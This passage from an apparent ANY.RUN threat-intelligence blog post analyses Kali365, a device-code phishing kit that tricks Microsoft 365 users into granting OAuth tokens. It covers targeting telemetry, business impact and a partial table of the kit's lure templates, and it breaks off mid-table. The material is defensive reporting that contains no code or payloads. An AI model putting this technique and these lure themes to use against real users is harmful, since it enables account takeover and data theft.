<p class="wp-block-paragraph">Once the victim&nbsp;successfully authenticates, the attackers&nbsp;obtain the OAuth access&nbsp;and refresh tokens&nbsp;issued to the application or client that&nbsp;initiated&nbsp;the device code flow.&nbsp;</p>



<p class="wp-block-paragraph">As a result, the risk shifts from traditional credential theft to the abuse of access and refresh tokens. The attack also produces fewer conventional phishing indicators. The Microsoft login page remains legitimate, the victim enters their password on Microsoft’s website rather than on an attacker-controlled page, and the interaction resembles a standard device authorization process.</p>



<p class="wp-block-paragraph">This&nbsp;can create blind&nbsp;spots&nbsp;in&nbsp;SOC visibility and make the attack more difficult to&nbsp;identify&nbsp;using traditional phishing detection methods.&nbsp;</p>



<h3 class="wp-block-heading">Kali365&nbsp;SharePoint Lure&nbsp;</h3>



<p class="wp-block-paragraph">The following ANY.RUN&nbsp;sandbox&nbsp;session&nbsp;shows&nbsp;an example of a Kali365 phishing page using a&nbsp;SharePoint-themed lure:&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/d078f430-c3cc-44e8-a809-5506205049c3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis&nbsp;session and gather IOCs</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1024" height="675" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_1.webp" alt="" class="wp-image-22292" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_1.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_1-300x198.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_1-768x506.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_1-370x244.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_1-270x178.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_1-740x488.webp 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Kali365&nbsp;phishing&nbsp;page&nbsp;using&nbsp;a&nbsp;SharePoint-themed&nbsp;lure</em>&nbsp;</figcaption></figure>
</div>


<h3 class="wp-block-heading">Microsoft Device Login Flow&nbsp;</h3>



<p class="wp-block-paragraph">After interacting with the lure, the victim is&nbsp;directed to Microsoft’s&nbsp;legitimate device login page, where they enter the attacker-provided code and complete the authentication process.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1024" height="671" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_2.webp" alt="" class="wp-image-22294" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_2.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_2-300x197.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_2-768x503.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_2-370x242.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_2-270x177.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_2-740x485.webp 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Redirection&nbsp;to&nbsp;Microsoft’s&nbsp;legitimate&nbsp;device&nbsp;login&nbsp;page&nbsp;analyzed&nbsp;insideANY.RUN&nbsp;sandbox</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">Kali365 Telemetry: US&nbsp;Targeting and Industry Exposure&nbsp;</h2>



<p class="wp-block-paragraph">According to ANY.RUN telemetry, the United States is the primary geographic target of Kali365. More than 80 public sessions linked to the phishkit are recorded in the ANY.RUN public sandbox each week, indicating a sustained focus on US organizations and Microsoft 365 users.</p>



<p class="wp-block-paragraph">Kali365 activity spans a broad range of industries, with the strongest signals observed across <strong>MSSPs, manufacturing, technology, government and public administration, healthcare, and consulting</strong>.</p>



<p class="wp-block-paragraph">Kali365 activity targeting the US and industries can be explored in ANY.RUN <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>:</p>



<p class="wp-block-paragraph">TI&nbsp;Lookup&nbsp;query:&nbsp;<a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22kali365%5C%22%20and%20submissionCountry:%5C%22US%5C%22%22,%22dateRange%22:30}" target="_blank" rel="noreferrer noopener">threatName:&#8221;kali365&#8243; and&nbsp;submissionCountry:&#8221;US&#8221;</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="489" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-1024x489.png" alt="" class="wp-image-22222" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-1024x489.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-300x143.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-768x367.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-1536x734.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-2048x979.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-370x177.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-270x129.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/1-1-740x354.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>US&nbsp;industries&nbsp;being&nbsp;targeted&nbsp;by&nbsp;Kali&nbsp;365</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">This&nbsp;distribution reflects&nbsp;the nature of Device Code Phishing. Kali365 is&nbsp;not limited to a&nbsp;single vertical. Instead, it targets&nbsp;organizations&nbsp;that rely heavily on Microsoft 365 and cloud-based identity&nbsp;services, where compromised OAuth tokens&nbsp;may provide access&nbsp;to corporate email, documents, and internal&nbsp;SaaS resources&nbsp;without requiring attackers&nbsp;to&nbsp;steal the victim’s&nbsp;password directly.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Turn threat intelligence into faster action.  .</span><br>
See where attacks are active and respond before risk grows. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=kali365-phishing-targeting-us&#038;utm_term=210726&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Your Defenses </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">Another notable finding is&nbsp;that most Kali365 phishing pages&nbsp;observed&nbsp;by ANY.RUN use the&nbsp;.de&nbsp;top-level domain.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1024" height="583" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_3.webp" alt="" class="wp-image-22296" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_3.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_3-300x171.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_3-768x437.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_3-370x211.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_3-270x154.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen_3-740x421.webp 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>.de&nbsp;top-level&nbsp;domain&nbsp;usage&nbsp;exposed&nbsp;inside&nbsp;ANY.RUN’s&nbsp;TI&nbsp;Lookup</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">Business&nbsp;Impact&nbsp;of&nbsp;Kali365&nbsp;on&nbsp;US&nbsp;Organizations&nbsp;</h2>



<p class="wp-block-paragraph">For US organizations, Kali365 can turn a single device authorization request into a broader cloud security incident. Once attackers obtain OAuth access and refresh tokens, they may continue accessing Microsoft 365 resources without needing to steal or repeatedly enter the victim’s password.</p>



<p class="wp-block-paragraph">This&nbsp;can&nbsp;create&nbsp;several&nbsp;business&nbsp;risks:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Financial loss:</strong> Compromised email accounts can support payment fraud, invoice manipulation, and business email compromise.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Operational&nbsp;disruption:</strong>&nbsp;Attackers&nbsp;may&nbsp;access&nbsp;or&nbsp;alter&nbsp;documents,&nbsp;communications,&nbsp;and&nbsp;cloud&nbsp;services&nbsp;used&nbsp;in&nbsp;daily&nbsp;operations.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Sensitive&nbsp;data&nbsp;exposure:</strong>&nbsp;Corporate&nbsp;email,&nbsp;internal&nbsp;files,&nbsp;customer&nbsp;information,&nbsp;and&nbsp;confidential&nbsp;business&nbsp;data&nbsp;may&nbsp;be&nbsp;exposed.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Higher response and recovery costs:</strong> Limited traditional phishing indicators can delay detection, expand the investigation scope, and increase containment efforts.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Compliance&nbsp;and&nbsp;legal&nbsp;exposure:</strong>&nbsp;Unauthorized&nbsp;access&nbsp;to&nbsp;regulated&nbsp;or&nbsp;personal&nbsp;data&nbsp;may&nbsp;trigger&nbsp;reporting&nbsp;obligations&nbsp;and&nbsp;further&nbsp;scrutiny.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><strong>Loss of trust:</strong> A compromise involving customer communications or sensitive data can damage relationships with clients, partners, and employees.</li>
</ul>



<p class="wp-block-paragraph">Because the victim authenticates through a legitimate Microsoft page, the activity may initially appear routine. This can give attackers more time to abuse trusted accounts, move through cloud resources, and increase the financial and operational impact before the incident is confirmed.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Give your SOC full attack visibility with ANY.RUN.</span><br>
Confirm attacks faster and reduce fraud and recovery costs. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Reduce Incident Risk </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Inside Kali365: Lure Templates, Phishing Flows, and API Endpoints</h2>



<p class="wp-block-paragraph">Using ANY.RUN’s <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">in-browser data investigation</a>, analysts can examine encrypted Kali365 code directly inside the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>. Available through the <strong>Browser Data</strong> section, this capability provides browser-level visibility into the attack and reveals content that may remain hidden from static analysis.</p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/d078f430-c3cc-44e8-a809-5506205049c3?w=6a159a1627c28eea157d87e6&amp;t=details&amp;rls=en&amp;q=%3Futm_source%3Danyrunblog&amp;utm_medium=article&amp;utm_campaign=kali365-phishing-targeting-us&amp;utm_term=210726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Check browser-level data of the attack</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1024" height="938" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen4.webp" alt="" class="wp-image-22297" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen4.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen4-300x275.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen4-768x704.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen4-370x339.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen4-270x247.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/kali_screen4-740x678.webp 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>In-browser&nbsp;data&nbsp;investigation&nbsp;revealing&nbsp;details&nbsp;of&nbsp;the&nbsp;phishing&nbsp;attack&nbsp;</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Once decrypted, the code exposes a configuration built to support multi-brand impersonation and multiple phishing flows.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="283" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-1024x283.png" alt="" class="wp-image-22225" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-1024x283.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-300x83.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-768x212.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-1536x424.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-2048x565.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-370x102.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-270x74.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/2-740x204.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Kali365 JS&nbsp;configuration</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The design field determines which lure page template is displayed to the victim. At the current stage of the phishkit’s development, Kali365 includes 34 templates:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-352"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="35"
           data-wpID="352"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        #                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Design                     </th>
                                                <th class="wpdt-cell wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Visual lure                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        1                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        onedrive                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        OneDrive shared document                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        2                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        sharepoint                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        SharePoint shared document                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        3                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        teams                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Teams file/message                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        4                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        outlook                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Outlook encrypted/protectedmessage                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        5                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        voicemail                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Outlook voicemail                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        6                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        sharepoint_site                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        SharePoint team/site document                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        7                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        onenote                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        OneNote                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        8                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        dropbox                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Dropbox                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        9                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        google_drive                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Google Drive shared file                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        10                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        docusign                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        DocuSign                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        11                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        adobe                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe document/signature                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        12                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        ms_admin                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Admin                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        13                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        ms_security                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Security                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A15"
                    data-col-index="0"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        14                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B15"
                    data-col-index="1"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        ms_teams_meeting                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C15"
                    data-col-index="2"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Teams meeting                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A16"
                    data-col-index="0"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        15                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B16"
                    data-col-index="1"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        ms_forms                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C16"
                    data-col-index="2"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Forms                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A17"
                    data-col-index="0"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        16                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B17"
                    data-col-index="1"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        ms_planner                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C17"
                    data-col-index="2"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Planner                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A18"
                    data-col-index="0"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        17                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B18"
                    data-col-index="1"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        ms_calendar                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C18"
                    data-col-index="2"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Calendar                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A19"
                    data-col-index="0"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        18                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B19"
                    data-col-index="1"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        ms_powerautomate                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C19"
                    data-col-index="2"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        Power Automate                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A20"
                    data-col-index="0"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        19                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B20"
                    data-col-index="1"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        ms_sway                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C20"
                    data-col-index="2"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Sway                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A21"
                    data-col-index="0"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        20                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B21"
                    data-col-index="1"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        ms_stream                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C21"
                    data-col-index="2"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Stream                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A22"
                    data-col-index="0"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        21                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B22"
                    data-col-index="1"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        ms_whiteboard                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C22"
                    data-col-index="2"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Whiteboard                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A23"
                    data-col-index="0"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        22                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B23"
                    data-col-index="1"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        ms_bookings                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C23"
                    data-col-index="2"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft Bookings                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A24"
                    data-col-index="0"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        23                     </td>
